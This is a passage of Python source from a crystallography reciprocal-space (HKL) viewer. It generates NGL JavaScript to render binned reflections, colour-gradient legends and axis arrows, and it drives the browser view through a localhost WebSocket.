h_axis = flex.vec3_double([self.scene.axes[0]])
k_axis = flex.vec3_double([self.scene.axes[1]])
l_axis = flex.vec3_double([self.scene.axes[2]])
self.unit_h_axis = 1.0/h_axis.norm() * h_axis
self.unit_k_axis = 1.0/k_axis.norm() * k_axis
self.unit_l_axis = 1.0/l_axis.norm() * l_axis
self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
self.normal_hk = h_axis.cross( k_axis )
self.normal_kl = k_axis.cross( l_axis )
self.normal_lh = l_axis.cross( h_axis )
maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
l1 = self.scene.renderscale * maxnorm * 1.1
l2= self.scene.renderscale * maxnorm * 1.15
Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
# make arrow font size roughly proportional to radius of highest resolution shell
#fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
if not self.miller_array:
fontsize = str(1.0)
else:
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0)))
if blankscene:
axisfuncstr = "\nvar MakeHKL_Axis = function() { };\n"
else:
axisfuncstr = """
var fontsize = %s;
function MakeHKL_Axis(mshape)
{
// xyz arrows
mshape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origin');
//blue-x
mshape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
mshape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
mshape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
mshape.addText( %s, [ 0, 0, 1 ], fontsize, 'h');
mshape.addText( %s, [ 0, 1, 0 ], fontsize, 'k');
mshape.addText( %s, [ 1, 0, 0 ], fontsize, 'l');
};
""" %(fontsize, str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart),
str(Kstararrowend), str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt,
Kstararrowtxt, Lstararrowtxt)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLscenesMindata[self.colour_scene_id]
maxcolourscalar = self.HKLscenesMaxdata[self.colour_scene_id]
if self.settings.sigma_color:
mincolourscalar = self.HKLscenesMinsigmas[self.colour_scene_id]
maxcolourscalar = self.HKLscenesMaxsigmas[self.colour_scene_id]
span = maxcolourscalar - mincolourscalar
ln = 60
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray = flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscenes[self.colour_scene_id].miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
fomarrays = []
if self.HKLscenes[self.colour_scene_id].isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
# make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
else:
fomln =1
fomarrays = [1.0]
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
else:
fomln = 1
fomarrays = [1.0]
colourgradarrays.append(graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme) * 255.0)
colors = self.HKLscenes[self.colour_scene_id].colors
radii = self.HKLscenes[self.radii_scene_id].radii
self.meanradius = flex.mean(radii)
if blankscene:
points = flex.vec3_double( [ ] )
colors = flex.vec3_double( [ ] )
radii = flex.double( [ ] )
self.binscenelabel = "Resolution"
else:
points = self.scene.points
nrefls = points.size()
hkls = self.scene.indices
dres = self.scene.dres
if self.binscenelabel=="Resolution":
colstr = "dres"
else:
colstr = self.HKLscenes[ int(self.binscenelabel) ].work_array.info().label_string()
data = self.scene.data
colourlabel = self.HKLscenes[self.colour_scene_id].colourlabel
fomlabel = self.HKLscenes[self.colour_scene_id].fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.binvalsboundaries = []
if self.binscenelabel=="Resolution":
self.binvalsboundaries = self.binvals
self.bindata = 1.0/self.scene.dres
else:
ibinarray= int(self.binscenelabel)
self.binvalsboundaries = [ self.HKLscenesMindata[ibinarray] - 0.1 , self.HKLscenesMaxdata[ibinarray] + 0.1 ]
self.binvalsboundaries.extend( self.binvals )
self.binvalsboundaries.sort()
if self.binvalsboundaries[0] < 0.0:
self.binvalsboundaries.append(0.0)
self.binvalsboundaries.sort()
#self.bindata = self.HKLscenes[ibinarray].data
self.bindata = self.MatchBinArrayToSceneArray(ibinarray)
if self.HKLscenes[ibinarray].work_array.is_complex_array():
self.bindata = self.HKLscenes[ibinarray].ampl
self.nbinvalsboundaries = len(self.binvalsboundaries)
# Un-binnable data is scene data values where the bin array has no corresponding miller index
# Just put these in a separate bin and pay attention to the book keeping!
for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.binvalsboundaries):
if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
return self.nbinvalsboundaries
if (ibin+1) == self.nbinvalsboundaries:
return ibin
if d > binval and d <= self.binvalsboundaries[ibin+1]:
return ibin
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
raise Sorry("Should never get here")
if nrefls > 0 and self.bindata.size() != points.size():
raise Sorry("Not the same number of reflections in bin-data and displayed data")
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( self.bindata[i] )
positions[ibin].extend( roundoff(list(hklstars), 2) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
#spbufttips[ibin].append(self.tooltipstrings[i] )
if self.script_has_tooltips:
spbufttips[ibin].append(self.tooltipstringsdict[hkls[i]])
else:
spbufttips[ibin].append( i )
#spherebufferstr = ""
spherebufferstr = self.colstraliases
negativeradiistr = ""
cntbin = 0
self.binstrs = []
self.bin_infotpls = []
for ibin in range(self.nbinvalsboundaries+1):
mstr =""
nreflsinbin = len(radii2[ibin])
if nreflsinbin == 0:
continue
bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
if ibin == self.nbinvalsboundaries:
mstr= "bin[%d] has %d un-matching reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
if ibin < (self.nbinvalsboundaries-1):
bin1= self.binvalsboundaries[ibin]
bin2= self.binvalsboundaries[ibin+1]
if colstr=="dres":
bin1= 1.0/self.binvalsboundaries[ibin]
bin2= 1.0/self.binvalsboundaries[ibin+1]
mstr= "bin[%d] has %d reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 )) )
self.binstrs.append(mstr)
self.mprint(mstr, verbose=0)
spherebufferstr += "\n// %s\n" %mstr
if self.script_has_tooltips:
uncrustttips = str(spbufttips[ibin]).replace('\"', '\'')
uncrustttips = uncrustttips.replace("\'\'+", "")
spherebufferstr += " ttips.push( %s );" %uncrustttips
else:
#spherebufferstr += " ttips.push( [ ] );"
ttlst = [-1]
ttlst.extend(spbufttips[ibin])
spherebufferstr += " ttips.push( %s );" %str( ttlst )
spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
str(radii2[ibin]), self.primitivetype, cntbin, \
cntbin)
if self.primitivetype == "SphereBuffer":
spherebufferstr += "\n radius: radii[%d]," %cntbin
spherebufferstr += "\n picking: ttips[%d]," %cntbin
if self.primitivetype == "PointBuffer":
spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.settings.scale
else:
if self.high_quality:
spherebufferstr += """
})
);
"""
else:
spherebufferstr += """
}, { disableImpostor: true
, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
);
"""
spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n alphas.push(1.0);\n" %cntbin
if ibin <self.nbinvalsboundaries and self.binvalsboundaries[ibin] < 0.0:
negativeradiistr += "shapebufs[%d].setParameters({metalness: 1});\n" %cntbin
cntbin += 1
#self.ngl_settings.bin_opacities = str([ "1.0, %d"%e for e in range(cntbin) ])
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
"bin_infotpls": self.bin_infotpls,
"bin_data_label": colstr,
"tooltip_opacity": self.ngl_settings.tooltip_alpha
} )
spherebufferstr += """
// create tooltip element and add to the viewer canvas
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(
function (pickingProxy)
{
//tooltip.style.display = "none";
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
var cp = pickingProxy.canvasPosition;
"""
if self.script_has_tooltips:
spherebufferstr += """
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var sym_id = -1;
var hkl_id = -1
if (pickingProxy.picker.length > 0)
{ // get stored id number of symmetry operator applied to this hkl
sym_id = pickingProxy.picker[0];
var ids = pickingProxy.picker.slice(1);
var is_friedel_mate = 0;
hkl_id = ids[ pickingProxy.pid % ids.length ];
if (pickingProxy.pid >= ids.length)
is_friedel_mate = 1;
}
// tell python the id of the hkl and id number of the symmetry operator
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milli second as not to overwhelm python
WebsockSendMsg( 'tooltip_id: [' + String([sym_id, hkl_id, is_friedel_mate]) + ']' );
timenow = timefunc();
}
if (current_ttip !== "" )
{
tooltip.innerText = current_ttip;
"""
spherebufferstr += """ tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}
}
else
{
tooltip.style.display = "none";
current_ttip = "";
}
}
);
stage.mouseObserver.signals.dragged.add(
function ( deltaX, deltaY)
{
if (clipFixToCamPosZ === true)
{
stage.viewer.parameters.clipNear = origclipnear + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.parameters.clipFar = origclipfar + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.requestRender();
}
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milli second as not to overwhelm python
postrotmxflag = true;
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
timenow = timefunc();
}
}
);
stage.mouseObserver.signals.clicked.add(
function (x, y)
{
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
}
);
stage.mouseObserver.signals.scrolled.add(
function (delta)
{
if (clipFixToCamPosZ === true)
{
stage.viewer.parameters.clipNear = origclipnear + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.parameters.clipFar = origclipfar + (origcameraZpos - stage.viewer.camera.position.z);
stage.viewer.requestRender();
}
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
rightnow = timefunc();
if (rightnow - timenow > 250)
{ // only post every 250 milli second as not to overwhelm python
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
timenow = timefunc();
}
}
);
stage.viewer.signals.rendered.add(
function()
{
if (postrotmxflag === true)
{
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
postrotmxflag = false;
}
}
);
"""
spherebufferstr += """
stage.signals.clicked.add(
function (pickingProxy)
{
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
"""
if self.script_has_tooltips:
spherebufferstr += " var innerText = pickingProxy.picker[pickingProxy.pid];\n"
else:
spherebufferstr += " var innerText = pickingProxy.pid;"
spherebufferstr += """
WebsockSendMsg( innerText);
}
}
);
"""
colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
rgb = roundoff(val[1], 1)
gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
vstr = str( roundoff(val[0], 2) )
colourgradstr.append([vstr , gradval])
colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
if blankscene:
colourscriptstr = ""
else:
colourscriptstr = """
//colourgradvalarrays
%s
var ih = 3,
topr = 35,
topr2 = 10,
lp = 10,
wp = 40,
lp2 = lp + wp,
gl = 3,
wp2 = gl,
fomlabelheight = 25;
if (colourgradvalarray.length === 1)
{
wp2 = 15;
fomlabelheight = 0;
}
var wp3 = wp + colourgradvalarray.length * wp2 + 2;
totalheight = ih*colourgradvalarray[0].length + 35 + fomlabelheight;
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals as well as label legend of
// the displayed miller array
addDivBox("", topr2, lp, wp3, totalheight, 'rgba(255.0, 255.0, 255.0, 1.0)');
// print label of the miller array used for colouring
addDivBox("%s", topr2, lp, wp, 20);
if (colourgradvalarray.length > 1)
{
// print FOM label, 1, 0.5 and 0.0 values below colour chart
fomtop = topr2 + totalheight - 18;
fomlp = lp + wp;
fomwp = wp3;
fomtop2 = fomtop - 13;
// print the 1 number
addDivBox("1", fomtop2, fomlp, fomwp, 20);
// print the 0.5 number
leftp = fomlp + 0.48 * gl * colourgradvalarray.length;
addDivBox("0.5", fomtop2, leftp, fomwp, 20);
// print the FOM label
addDivBox("%s", fomtop, fomlp, fomwp, 20);
// print the 0 number
leftp = fomlp + 0.96 * gl * colourgradvalarray.length;
addDivBox("0", fomtop2, leftp, fomwp, 20);
}
for (j = 0; j < colourgradvalarray[0].length; j++)
{
rgbcol = colourgradvalarray[0][j][1];
val = colourgradvalarray[0][j][0];
topv = j*ih + topr;
toptxt = topv - 5;
// print value of miller array if present in colourgradvalarray[0][j][0]
addDivBox(val, toptxt, lp, wp, ih);
}
// draw the colour gradient
for (g = 0; g < colourgradvalarray.length; g++)
{
leftp = g*gl + lp + wp;
// if FOM values are supplied draw colour gradients with decreasing
// saturation values as stored in the colourgradvalarray[g] arrays
for (j = 0; j < colourgradvalarray[g].length; j++)
{
rgbcol = colourgradvalarray[g][j][1];
val = colourgradvalarray[g][j][0];
topv = j*ih + topr;
addDivBox("", topv, leftp, wp2, ih, rgbcol);
}
}
""" % (colourgradstrs, colourlabel, fomlabel)
#negativeradiistr = ""
#for ibin in range(self.nbinvalsboundaries):
# if self.binvalsboundaries[ibin] < 0.0:
# negativeradiistr += "shapebufs[%d].setParameters({metalness: 1})\n" %ibin
qualitystr = """ , { disableImpostor: true
, sphereDetail: 0 } // rather than default value of 2 icosahedral subdivisions
"""
if self.high_quality:
qualitystr = ""
self.NGLscriptstr = """
function createElement(name, properties, style)
{
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name);
Object.assign(el, properties);
Object.assign(el.style, style);
Object.assign(el.style,
{
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
);
return el;
}
function addElement(el)
{
// utility function used in for loop over colourgradvalarray
Object.assign(el.style,
{
position: "absolute",
zIndex: 10
}
);
stage.viewer.container.appendChild(el);
}
function addDivBox(txt, t, l, w, h, bgcolour='rgba(255.0, 255.0, 255.0, 0.0)')
{
divbox = createElement("div",
{
innerText: txt
},
{
backgroundColor: bgcolour,
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: t.toString() + "px",
left: l.toString() + "px",
width: w.toString() + "px",
height: h.toString() + "px",
}
);
addElement(divbox);
}
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:%s/');
function WebsockSendMsg(msg)
{
try
{
mysocket.send(msg);
mysocket.send( 'Ready ' + pagename + '\\n' );
}
catch(err)
{
alert('JavaScriptError: ' + err.stack );
addDivBox("Error!", window.innerHeight - 50, 20, 40, 20, rgba(100.0, 100.0, 100.0, 0.0));
}
}
mysocket.onopen = function(e)
{
WebsockSendMsg('%s now connected via websocket to ' + pagename + '\\n');
};
mysocket.onclose = function(e)
{
WebsockSendMsg('%s now disconnecting from websocket ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function(error)
{
console.log('WebSocket Error ' + error);
};
var stage;
var shape;
var shapeComp;
var vectorreprs = [];
var vectorshape;
var vectorshapeComps = [];
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
var ttips = [];
var current_ttip = "";
var positions = [];
var br_positions = [];
var br_colours = [];
var br_radii = [];
var br_ttips = [];
var colours = [];
var alphas = [];
var radii = [];
var shapebufs = [];
var br_shapebufs = [];
var nrots = 0;
var postrotmxflag = false;
var cvorient = new NGL.Matrix4();
var clipFixToCamPosZ = false;
var origclipnear;
var origclipfar;
var origcameraZpos;
var nbins = %s;
function timefunc() {
var d = new Date();
var now = d.getTime();
return now
}
var timenow = timefunc();
var rightnow = timefunc();
window.addEventListener( 'resize',
function( event ){
stage.handleResize();
},
false
);
///var script=document.createElement('script');
//script.src='https://rawgit.com/paulirish/memory-stats.js/master/bookmarklet.js';
//document.head.appendChild(script);
// define tooltip element
var tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, %s )",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
%s
function HKLscene()
{
shape = new NGL.Shape('shape');
vectorshape = new NGL.Shape('vectorshape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
MakeHKL_Axis(shape);
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update();
// if some radii are negative draw them with wireframe
%s
%s
stage.viewer.requestRender();
}
try
{
document.addEventListener('DOMContentLoaded', function() { HKLscene() }, false );
}
catch(err)
{
WebsockSendMsg('JavaScriptError: ' + err.stack );
}
""" % (self.websockport, self.__module__, self.__module__, cntbin, self.ngl_settings.tooltip_alpha, \
axisfuncstr, self.camera_type, spherebufferstr, negativeradiistr, colourscriptstr)
WebsockMsgHandlestr = """
mysocket.onmessage = function (e)
{
var c,
si;
WebsockSendMsg('\\n Browser: Got ' + e.data ); // tell server what it sent us
try
{
var datval = e.data.split(":\\n");
//alert('received2:\\n' + datval);
var msgtype = datval[0];
var val = datval[1].split(",");
if (msgtype === "alpha")
{
bin = parseInt(val[0]);
alphas[bin] = parseFloat(val[1]);
shapebufs[bin].setParameters({opacity: alphas[bin]});
for (var g=0; g < nrots; g++ )
br_shapebufs[bin][g].setParameters({opacity: alphas[bin]});
stage.viewer.requestRender();
}
if (msgtype === "colour")
{
bin = parseInt(val[0]);
si = parseInt(val[1]);
colours[bin][3*si] = parseFloat(val[2]);
colours[bin][3*si+1] = parseFloat(val[3]);
colours[bin][3*si+2] = parseFloat(val[4]);
shapebufs[bin].setAttributes({ color: colours[bin] });
for (var g=0; g < nrots; g++ )
{
br_colours[bin][3*si] = parseFloat(val[2]);
br_colours[bin][3*si+1] = parseFloat(val[3]);
br_colours[bin][3*si+2] = parseFloat(val[4]);
br_shapebufs[bin][g].setAttributes({ color: br_colours[bin] });
}
stage.viewer.requestRender();
}
if (msgtype === "ShowTooltip")
{
current_ttip = eval( String(val));
}
if (msgtype === "Redraw")
{
stage.viewer.requestRender();
}
if (msgtype === "ReOrient")
{
WebsockSendMsg( 'Reorienting ' + pagename );
sm = new Float32Array(16);
//alert('ReOrienting: ' + val)
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j]);
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.renderer.setClearColor( 0xffffff, 0.01);
stage.viewer.requestRender();
}
if (msgtype === "Reload")
{
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('OrientationBeforeReload:\\n' + msg );
WebsockSendMsg( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (msgtype.includes("Expand") )
{
WebsockSendMsg( 'Expanding data...' );
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
br_positions = [];
br_colours = [];
br_radii = [];
br_ttips = [];
br_shapebufs = [];
//alert('rotations:\\n' + val);
// Rotation matrices are concatenated to a string of floats
// separated by line breaks between each roation matrix
rotationstrs = datval[1].split("\\n");
var Rotmat = new NGL.Matrix3();
var sm = new Float32Array(9);
var r = new NGL.Vector3();
for (var bin=0; bin<nbins; bin++)
{
var nsize = positions[bin].length/3; // number of reflections in each bin
var csize = nsize*3;
var nsize3 = nsize*3;
var anoexp = false;
if (msgtype.includes("Friedel") )
{
anoexp = true;
csize = nsize*6;
}
br_positions.push( [] );
br_shapebufs.push( [] );
br_colours.push( [] );
br_radii.push( [] );
br_ttips.push( [] );
br_colours[bin] = colours[bin];
br_radii[bin] = radii[bin];
if (anoexp)
{
var colarr = [];
var cl = colours[bin].length;
for (var i=0; i<cl; i++)
{
colarr[i] = colours[bin][i];
colarr[i+cl] = colours[bin][i];
}
br_colours[bin] = new Float32Array(colarr);
var radiiarr = [];
var rl = radii[bin].length;
for (var i=0; i<rl; i++)
{
radiiarr[i] = radii[bin][i];
radiiarr[i+rl] = radii[bin][i];
}
br_radii[bin] = new Float32Array(radiiarr);
}
nrots = 0;
// if there is only the identity matrix that means no P1 expansion
for (var rotmxidx=0; rotmxidx < rotationstrs.length; rotmxidx++ )
{
if (rotationstrs[rotmxidx] < 1 )
continue;
nrots++;
br_positions[bin].push( [] );
br_shapebufs[bin].push( [] );
br_ttips[bin].push( [] );
br_ttips[bin][rotmxidx] = ttips[bin].slice(); // deep copy with slice()
br_ttips[bin][rotmxidx][0] = rotmxidx;
br_positions[bin][rotmxidx] = new Float32Array( csize );
// convert string of rotation matrix elements into a Matrix3
var elmstrs = rotationstrs[rotmxidx].split(",");
//alert('rot' + rotmxidx + ': ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
Rotmat.fromArray(sm);
for (var i=0; i<nsize; i++)
{
idx= i*3;
r.x = positions[bin][idx];
r.y = positions[bin][idx+1];
r.z = positions[bin][idx+2];
r.applyMatrix3(Rotmat)
br_positions[bin][rotmxidx][idx] = r.x;
br_positions[bin][rotmxidx][idx + 1] = r.y;
br_positions[bin][rotmxidx][idx + 2] = r.z;
if (anoexp)
{
r.negate(); // inversion for anomalous pair
br_positions[bin][rotmxidx][nsize3 + idx] = r.x;
br_positions[bin][rotmxidx][nsize3 + idx + 1] = r.y;
br_positions[bin][rotmxidx][nsize3 + idx + 2] = r.z;
}
}
br_shapebufs[bin][rotmxidx] = new NGL.SphereBuffer({
position: br_positions[bin][rotmxidx],
color: br_colours[bin],
radius: br_radii[bin],
// rotmxidx works as the id of the rotation of applied symmetry operator when creating tooltip for an hkl
picking: br_ttips[bin][rotmxidx],
} %s );
shape.addBuffer(br_shapebufs[bin][rotmxidx]);
//WebsockSendMsg( 'Memory usage: ' + String(window.performance.memory.totalJSHeapSize) +
// ', ' + String(window.performance.memory.totalJSHeapSize) );
}
}
MakeHKL_Axis(shape);
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
for (var bin=0; bin<nbins; bin++)
{
for (var rotmxidx=0; rotmxidx < nrots; rotmxidx++ )
{
br_shapebufs[bin][rotmxidx].setParameters({opacity: alphas[bin]});
}
}
stage.viewer.requestRender();
WebsockSendMsg( 'Expanded data' );
}
if (msgtype === "DisableMouseRotation")
{
WebsockSendMsg( 'Fix mouse rotation' + pagename );
stage.mouseControls.remove("drag-left");
stage.mouseControls.remove("scroll-ctrl");
stage.mouseControls.remove("scroll-shift");
}
if (msgtype === "EnableMouseRotation")
{
WebsockSendMsg( 'Can mouse rotate ' + pagename );
stage.mouseControls.add("drag-left", NGL.MouseActions.rotateDrag);
stage.mouseControls.add("scroll-ctrl", NGL.MouseActions.scrollCtrl);
stage.mouseControls.add("scroll-shift", NGL.MouseActions.scrollShift);
}
if (msgtype === "RotateStage")
{
WebsockSendMsg( 'Rotating stage ' + pagename );
strs = datval[1].split("\\n");
var sm = new Float32Array(9);
var m4 = new NGL.Matrix4();
var elmstrs = strs[0].split(",");
//alert('rot: ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
/* GL matrices are the transpose of the conventional rotation matrices
m4.set( sm[0], sm[1], sm[2], 0.0,
sm[3], sm[4], sm[5], 0.0,
sm[6], sm[7], sm[8], 0.0,
0.0, 0.0, 0.0, 1.0
);
*/
m4.set( sm[0], sm[3], sm[6], 0.0,
sm[1], sm[4], sm[7], 0.0,
sm[2], sm[5], sm[8], 0.0,
0.0, 0.0, 0.0, 1.0
);
stage.viewerControls.orient(m4);
if (strs[9]=="verbose")
postrotmxflag = true;
stage.viewer.requestRender();
//cvorient = stage.viewerControls.getOrientation().elements;
//msg = String(cvorient);
//WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
}
if (msgtype === "SpinAnimate")
{
WebsockSendMsg( 'SpinAnimating ' + pagename );
strs = datval[1].split("\\n");
var r = new Float32Array(3);
var elmstrs = strs[0].split(",");
for (j=0; j<3; j++)
r[j] = parseFloat(elmstrs[j]);
if (r[0] == 0.0 && r[1] == 0.0 && r[2] == 0.0)
{
// default bindings as per ngl\src\controls\mouse-actions.ts
stage.mouseControls.add("drag-ctrl-left", NGL.MouseActions.panDrag);
stage.mouseControls.add("drag-ctrl-right", NGL.MouseActions.focusScroll);
stage.mouseControls.add("drag-shift-left", NGL.MouseActions.zoomDrag);
stage.mouseControls.add("drag-shift-right", NGL.MouseActions.zoomFocusDrag);
stage.mouseControls.add("drag-middle", NGL.MouseActions.zoomFocusDrag);
stage.mouseControls.add("drag-right", NGL.MouseActions.panDrag);
stage.mouseControls.add("drag-left", NGL.MouseActions.rotateDrag);
stage.mouseControls.add("scroll-ctrl", NGL.MouseActions.scrollCtrl);
stage.mouseControls.add("scroll-shift", NGL.MouseActions.scrollShift);
stage.setSpin(false);
}
else
{
stage.spinAnimation.axis.set(r[0], r[1], r[2]);
stage.mouseControls.remove("drag-ctrl-left");
stage.mouseControls.remove("drag-ctrl-right");
stage.mouseControls.remove("drag-shift-left");
stage.mouseControls.remove("drag-shift-right");
stage.mouseControls.remove("drag-middle");
stage.mouseControls.remove("drag-right");
stage.mouseControls.remove("drag-left");
stage.mouseControls.remove("scroll-ctrl");
stage.mouseControls.remove("scroll-shift");
stage.setSpin(true);
}
}
if (msgtype === "TranslateHKLpoints")
{
WebsockSendMsg( 'Translating HKLs ' + pagename );
strs = datval[1].split("\\n");
var sm = new Float32Array(3);
var elmstrs = strs[0].split(",");
//alert('trans: ' + elmstrs);
for (j=0; j<3; j++)
sm[j] = parseFloat(elmstrs[j]);
shapeComp.setPosition([ sm[0], sm[1], sm[2] ])
stage.viewer.requestRender();
}
if (msgtype === "AddVector")
{
strs = datval[1].split("\\n");
